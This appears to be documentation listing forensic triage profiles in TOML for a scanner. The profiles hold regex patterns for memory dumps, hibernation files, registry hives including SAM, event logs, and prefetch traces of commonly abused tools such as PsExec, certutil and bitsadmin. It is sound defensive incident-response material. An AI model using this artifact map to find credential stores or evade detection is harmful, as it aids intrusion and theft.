  type = "regex"

[[patterns]]
  name = "macOS Diagnostic Reports"
  pattern = "DiagnosticReports"
  case-insensitive = true
  type = "regex"

# Process Memory Dumps
[[patterns]]
  name = "Process Dump"
  pattern = "\\.pdmp$"
  case-insensitive = true
  type = "regex"

# Raw Memory Images (specific patterns to avoid false positives)
[[patterns]]
  name = "Raw Memory Image"
  pattern = "(?:memory|memdump|ram|physmem).*\\.(?:raw|mem)$"
  case-insensitive = true
  type = "regex"

# Volatility-compatible formats
[[patterns]]
  name = "Lime Memory Dump"
  pattern = "\\.lime$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "VMware Snapshot Memory"
  pattern = "\\.vmem$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "VirtualBox Memory"
  pattern = "\\.sav$"
  case-insensitive = true
  type = "regex"

Profile: modules/memory/hibernation.toml

Source

Original path: profiles/modules/memory/hibernation.toml

Profile (TOML)

# Hibernation Files Module
# Collects hibernation and sleep state files

[module]
name = "Hibernation Files"
description = "Hibernation files, swap files, and sleep state data"
category = "memory"
platform = ["windows", "linux", "macos"]
priority = "high"

# Windows Hibernation File
[[patterns]]
  name = "Windows Hibernation File"
  pattern = "(?:^|[/\\\\])hiberfil\\.sys$"
  case-insensitive = true
  type = "regex"

# Windows Page File (Virtual Memory)
[[patterns]]
  name = "Windows Page File"
  pattern = "(?:^|[/\\\\])pagefile\\.sys$"
  case-insensitive = true
  type = "regex"

# Windows Swap File
[[patterns]]
  name = "Windows Swap File"
  pattern = "(?:^|[/\\\\])swapfile\\.sys$"
  case-insensitive = true
  type = "regex"

# Linux Swap
[[patterns]]
  name = "Linux Swap Partition"
  pattern = "(?:^|[/])swap(?:\\.[0-9]+)?$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Linux Swap File"
  pattern = "\\.swap$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Linux Swapfile"
  pattern = "(?:^|[/])swapfile$"
  case-insensitive = true
  type = "regex"

# macOS Sleep Image
[[patterns]]
  name = "macOS Sleep Image"
  pattern = "sleepimage$"
  case-insensitive = true
  type = "regex"

# macOS Hibernate Mode
[[patterns]]
  name = "macOS VM Directory"
  pattern = "/private/var/vm/"
  case-insensitive = false
  type = "regex"

# Compressed Hibernation
[[patterns]]
  name = "Compressed Hibernation"
  pattern = "hiber(?:file|nation).*\\.(?:gz|xz|lz4)$"
  case-insensitive = true
  type = "regex"

# UEFI/EFI Variables (may contain boot state info)
[[patterns]]
  name = "EFI Variables"
  pattern = "/sys/firmware/efi/efivars/"
  case-insensitive = false
  type = "regex"

Profile: modules/windows/all-windows.toml

Source

Original path: profiles/modules/windows/all-windows.toml

Profile (TOML)

# All Windows Compound Module
# Combines all Windows artifact modules

[module]
name = "All Windows Artifacts"
description = "Comprehensive Windows artifact collection (registry, event logs, prefetch, execution)"
category = "windows"
platform = ["windows"]
priority = "critical"

# Include individual Windows modules
includes = [
  "registry.toml",
  "event-logs.toml",
  "prefetch.toml",
  "execution.toml"
]

# Additional cross-Windows patterns
[[patterns]]
  name = "Windows Directory"
  pattern = "[/\\\\]Windows[/\\\\]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "System32 Directory"
  pattern = "[/\\\\]System32[/\\\\]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SysWOW64 Directory"
  pattern = "[/\\\\]SysWOW64[/\\\\]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Program Files"
  pattern = "[/\\\\]Program Files(?:\\s\\(x86\\))?[/\\\\]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "AppData Directory"
  pattern = "[/\\\\]AppData[/\\\\]"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Users Directory"
  pattern = "[/\\\\]Users[/\\\\]"
  case-insensitive = true
  type = "regex"

# MFT (Master File Table)
[[patterns]]
  name = "MFT"
  pattern = "(?:^|[/\\\\])\\$MFT$"
  case-insensitive = true
  type = "regex"

# USN Journal
[[patterns]]
  name = "USN Journal"
  pattern = "(?:^|[/\\\\])\\$UsnJrnl"
  case-insensitive = true
  type = "regex"

# $LogFile
[[patterns]]
  name = "NTFS LogFile"
  pattern = "(?:^|[/\\\\])\\$LogFile$"
  case-insensitive = true
  type = "regex"

# Recycle Bin
[[patterns]]
  name = "Recycle Bin"
  pattern = "\\$Recycle\\.Bin"
  case-insensitive = true
  type = "regex"

# Signatures for Windows artifacts
[[signatures]]
  name = "Multiple Windows Artifacts"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as windows_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Windows%' OR pattern_name LIKE '%Registry%' OR pattern_name LIKE '%Event%' OR pattern_name LIKE '%Prefetch%' GROUP BY sha256 HAVING windows_artifacts > 3"

Profile: modules/windows/event-logs.toml

Source

Original path: profiles/modules/windows/event-logs.toml

Profile (TOML)

# Windows Event Logs Module
# Collects Windows Event Log files (.evtx)

[module]
name = "Windows Event Logs"
description = "Windows Event Log files (.evtx) for system, security, and application events"
category = "windows"
platform = ["windows"]
priority = "high"

# Event Log Files
[[patterns]]
  name = "EVTX File"
  pattern = "\\.evtx$"
  case-insensitive = true
  type = "regex"

# Specific Event Logs
[[patterns]]
  name = "System Event Log"
  pattern = "System\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Security Event Log"
  pattern = "Security\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Application Event Log"
  pattern = "Application\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PowerShell Event Log"
  pattern = "(?:PowerShell|Windows PowerShell)\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Sysmon Event Log"
  pattern = "Microsoft-Windows-Sysmon.*\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Terminal Services Event Log"
  pattern = "TerminalServices.*\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Windows Defender Event Log"
  pattern = "Windows Defender.*\\.evtx"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "TaskScheduler Event Log"
  pattern = "TaskScheduler.*\\.evtx"
  case-insensitive = true
  type = "regex"

# Event Log Directory
[[patterns]]
  name = "Winevt Logs Directory"
  pattern = "Winevt[/\\\\]Logs"
  case-insensitive = true
  type = "regex"

Profile: modules/windows/execution.toml

Source

Original path: profiles/modules/windows/execution.toml

Profile (TOML)

# Windows Evidence of Execution Module
# Collects Windows execution artifacts (Prefetch, AppCompat, BAM/DAM, etc.)

[module]
name = "Windows Evidence of Execution"
description = "Prefetch, ShimCache, AppCompatCache, BAM/DAM, UserAssist"
category = "windows"
platform = ["windows"]
priority = "high"

# Prefetch Files
[[patterns]]
  name = "Prefetch File"
  pattern = "\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Prefetch Directory"
  pattern = "Prefetch"
  case-insensitive = true
  type = "regex"

# ShimCache/AppCompatCache
[[patterns]]
  name = "ShimCache"
  pattern = "AppCompatCache"
  case-insensitive = true
  type = "regex"

# Background Activity Moderator (BAM) / Desktop Activity Moderator (DAM)
[[patterns]]
  name = "BAM DAM"
  pattern = "(?:BAM|DAM)"
  case-insensitive = true
  type = "regex"

# UserAssist
[[patterns]]
  name = "UserAssist"
  pattern = "UserAssist"
  case-insensitive = true
  type = "regex"

# MUI Cache
[[patterns]]
  name = "MUICache"
  pattern = "MUICache"
  case-insensitive = true
  type = "regex"

# RecentApps
[[patterns]]
  name = "RecentApps"
  pattern = "RecentApps"
  case-insensitive = true
  type = "regex"

# FeatureUsage
[[patterns]]
  name = "FeatureUsage"
  pattern = "FeatureUsage"
  case-insensitive = true
  type = "regex"

# SRUM (System Resource Usage Monitor)
[[patterns]]
  name = "SRUM Database"
  pattern = "SRUDB\\.dat"
  case-insensitive = true
  type = "regex"

# Windows Timeline
[[patterns]]
  name = "Windows Timeline"
  pattern = "ActivitiesCache\\.db"
  case-insensitive = true
  type = "regex"

# JumpLists
[[patterns]]
  name = "Automatic JumpLists"
  pattern = "AutomaticDestinations"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Custom JumpLists"
  pattern = "CustomDestinations"
  case-insensitive = true
  type = "regex"

# Shortcut Files (LNK)
[[patterns]]
  name = "LNK File"
  pattern = "\\.lnk$"
  case-insensitive = true
  type = "regex"

Profile: modules/windows/prefetch.toml

Source

Original path: profiles/modules/windows/prefetch.toml

Profile (TOML)

# Windows Prefetch Module
# Collects Windows Prefetch files for execution analysis

[module]
name = "Windows Prefetch"
description = "Windows Prefetch files (.pf) for application execution history"
category = "windows"
platform = ["windows"]
priority = "high"

# Prefetch Files
[[patterns]]
  name = "Prefetch File"
  pattern = "\\.pf$"
  case-insensitive = true
  type = "regex"

# Prefetch Directory
[[patterns]]
  name = "Prefetch Directory"
  pattern = "[/\\\\]Prefetch[/\\\\]"
  case-insensitive = true
  type = "regex"

# Specific Prefetch Patterns for Common Tools
[[patterns]]
  name = "CMD Prefetch"
  pattern = "CMD\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PowerShell Prefetch"
  pattern = "POWERSHELL.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "WMIC Prefetch"
  pattern = "WMIC\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "PSEXEC Prefetch"
  pattern = "PSEXEC.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "MSHTA Prefetch"
  pattern = "MSHTA\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "REGSVR32 Prefetch"
  pattern = "REGSVR32\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "RUNDLL32 Prefetch"
  pattern = "RUNDLL32\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "CSCRIPT Prefetch"
  pattern = "CSCRIPT\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "WSCRIPT Prefetch"
  pattern = "WSCRIPT\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "CERTUTIL Prefetch"
  pattern = "CERTUTIL\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "BITSADMIN Prefetch"
  pattern = "BITSADMIN\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "NET Prefetch"
  pattern = "NET(?:1)?\\.EXE.*\\.pf$"
  case-insensitive = true
  type = "regex"

# Superfetch/ReadyBoot
[[patterns]]
  name = "Superfetch Database"
  pattern = "Ag(?:Robust)?App\\.db$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "ReadyBoot"
  pattern = "ReadyBoot"
  case-insensitive = true
  type = "regex"

Profile: modules/windows/registry.toml

Source

Original path: profiles/modules/windows/registry.toml

Profile (TOML)

# Windows Registry Artifacts Module
# Collects Windows Registry hives and important registry artifacts

[module]
name = "Windows Registry Artifacts"
description = "Windows Registry hives (SAM, SYSTEM, SOFTWARE, NTUSER, etc.)"
category = "windows"
platform = ["windows"]
priority = "critical"

# Registry Hive Files
[[patterns]]
  name = "SAM Registry Hive"
  pattern = "(?:^|[/\\\\])SAM$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SYSTEM Registry Hive"
  pattern = "(?:^|[/\\\\])SYSTEM$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SOFTWARE Registry Hive"
  pattern = "(?:^|[/\\\\])SOFTWARE$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "SECURITY Registry Hive"
  pattern = "(?:^|[/\\\\])SECURITY$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "DEFAULT Registry Hive"
  pattern = "(?:^|[/\\\\])DEFAULT$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "NTUSER.DAT Registry Hive"
  pattern = "NTUSER\\.DAT"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "UsrClass.dat Registry Hive"
  pattern = "UsrClass\\.dat"
  case-insensitive = true
  type = "regex"

# Registry Transaction Logs
[[patterns]]
  name = "Registry Transaction Log"
  pattern = "\\.(?:LOG|LOG1|LOG2)$"
  case-insensitive = true
  type = "regex"

# AmCache (Application Compatibility Cache)
[[patterns]]
  name = "AmCache Hive"
  pattern = "Amcache\\.hve"
  case-insensitive = true
  type = "regex"

# Registry Backups
[[patterns]]
  name = "Registry Backup"
  pattern = "RegBack"
  case-insensitive = true
  type = "regex"

Profile: targets/KAPE_BrowserHistory.toml

Source

Original path: profiles/targets/KAPE_BrowserHistory.toml

Profile (TOML)

# KAPE Browser History Target
# Collects all browser history and artifacts

[target]
name = "KAPE_BrowserHistory"
description = "Comprehensive browser artifact collection (all browsers)"
category = "browser"
priority = "high"

# All browser modules
modules = [
  "browser/all-browsers"
]

# Additional browser-related patterns
[[patterns]]
  name = "Browser Process"
  pattern = "(?:chrome|firefox|edge|safari|iexplore)\\.exe"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Browser Extension"
  pattern = "(?:crx|xpi)$"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Browser Activity Summary"
  query = "SELECT COUNT(DISTINCT sha256) as files_with_browser_artifacts FROM pattern_matches WHERE pattern_name LIKE '%Browser%' OR pattern_name LIKE '%Chrome%' OR pattern_name LIKE '%Firefox%'"

Profile: targets/KAPE_EvidenceOfExecution.toml

Source

Original path: profiles/targets/KAPE_EvidenceOfExecution.toml

Profile (TOML)

# KAPE Evidence of Execution Target
# Collects Windows execution artifacts

[target]
name = "KAPE_EvidenceOfExecution"
description = "Windows evidence of execution artifacts (Prefetch, ShimCache, BAM/DAM, etc.)"
category = "windows"
priority = "high"

# Execution artifact modules
modules = [
  "windows/execution"
]

# Include registry for AppCompatCache
modules_optional = [
  "windows/registry"
]

# Additional execution patterns
[[patterns]]
  name = "Executable File"
  pattern = "\\.(?:exe|dll|sys|scr|com)$"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Script File"
  pattern = "\\.(?:bat|cmd|ps1|vbs|js|wsf)$"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Execution Artifacts Summary"
  query = "SELECT pattern_name, COUNT(*) as count FROM pattern_matches WHERE pattern_name LIKE '%Prefetch%' OR pattern_name LIKE '%ShimCache%' OR pattern_name LIKE '%BAM%' OR pattern_name LIKE '%UserAssist%' OR pattern_name LIKE '%JumpList%' GROUP BY pattern_name ORDER BY count DESC"

Profile: targets/KAPE_Triage.toml

Source

Original path: profiles/targets/KAPE_Triage.toml

Profile (TOML)

# KAPE Triage Target
# Equivalent to KAPE's !SANS_Triage compound target
# Comprehensive triage collection for incident response

[target]
name = "KAPE_Triage"
description = "Comprehensive forensic triage similar to KAPE !SANS_Triage"
category = "triage"
priority = "critical"

# Include core forensic modules
modules = [
  "windows/registry",
  "windows/execution",
  "windows/event-logs",
  "browser/all-browsers"
]

# Include base profiles for security analysis
includes = [
  "../base/malware.toml",
  "../base/credentials.toml",
  "../base/network.toml"
]

# Additional triage-specific patterns
[[patterns]]
  name = "Triage Marker"
  pattern = "triage"
  case-insensitive = true
  type = "string"

[[patterns]]
  name = "Incident Response"
  pattern = "(?:incident|response|IR|forensic)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Evidence Tag"
  pattern = "(?:evidence|exhibit|case.?\\d+)"
  case-insensitive = true
  type = "regex"

# Triage-specific signatures
[[signatures]]
  name = "Triage High Value Artifacts"
  query = "SELECT DISTINCT sha256 FROM pattern_matches WHERE pattern_name IN ('Registry Hive', 'Event Log', 'Prefetch File', 'Browser History')"

[[signatures]]
  name = "Execution Evidence"
  query = "SELECT sha256, COUNT(DISTINCT pattern_name) as execution_indicators FROM pattern_matches WHERE pattern_name LIKE '%Prefetch%' OR pattern_name LIKE '%ShimCache%' OR pattern_name LIKE '%BAM%' OR pattern_name LIKE '%UserAssist%' GROUP BY sha256 HAVING execution_indicators > 1"

Profile: targets/Quick_Triage.toml

Source

Original path: profiles/targets/Quick_Triage.toml

Profile (TOML)

# Quick Triage Target
# Fast triage for initial incident assessment

[target]
name = "Quick_Triage"
description = "Fast triage collection for rapid incident assessment"
category = "triage"
priority = "high"

# Essential modules only
modules = [
  "windows/execution",
  "browser/chrome",
  "browser/firefox"
]

# Core security patterns
includes = [
  "../base/malware.toml",
  "../base/credentials.toml"
]

# Quick triage patterns
[[patterns]]
  name = "Recent Activity"
  pattern = "(?:recent|temp|cache)"
  case-insensitive = true
  type = "regex"

[[patterns]]
  name = "Suspicious Extension"
  pattern = "\\.(?:exe|dll|bat|ps1|vbs|js)$"
  case-insensitive = true
  type = "regex"

[[signatures]]
  name = "Quick Triage Hits"
  query = "SELECT sha256, COUNT(*) as hit_count FROM pattern_matches GROUP BY sha256 HAVING hit_count > 2 ORDER BY hit_count DESC LIMIT 100"

Keyboard shortcuts

sus - Systematic Universal Scanner - Documentation